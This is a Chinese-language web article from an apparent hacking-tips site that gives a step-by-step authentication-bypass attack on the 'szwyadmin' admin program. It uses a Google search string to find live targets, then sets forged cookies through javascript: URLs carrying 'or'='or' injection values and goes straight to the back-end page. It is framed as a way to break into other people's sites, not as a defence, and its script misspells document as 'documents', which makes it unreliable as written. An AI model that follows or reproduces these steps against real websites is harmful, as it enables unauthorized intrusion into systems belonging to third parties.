• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    szwyadmin程序cookies欺骗漏洞拿shell

    时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

    首先我们在Google中搜索关键词
    关键字:inurl:szwyadmin/login.asp
    任意打开一个搜索结果,打开登录界面后在地址栏中输入下面的代码:
    代码:javascript:alert(documents.cookie="adminuser="+escape("'or'='or'"));
    javascript:alert(documents.cookie="adminpass="+escape("'or'='or'"));
    javascript:alert(documents.cookie="admindj="+escape("1"));
    关闭此页面
     
     
    在次打开登录界面
    在地址栏中将login.asp改为admin_index.asp
    就直接进入后台了
     
    另外还可以试试
    ewebeditor/admin_login.asp ,www.xuhantao.com,涛涛电脑知识

  • 上一篇:服务器安全狗提权放sethc后门
  • 下一篇:华为网盘存储型XSS,可加载外部JS
    • 相关文章
    • 没有相关文章
    共有评论 0相关评论
    发表我的评论
    • 大名:
    • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1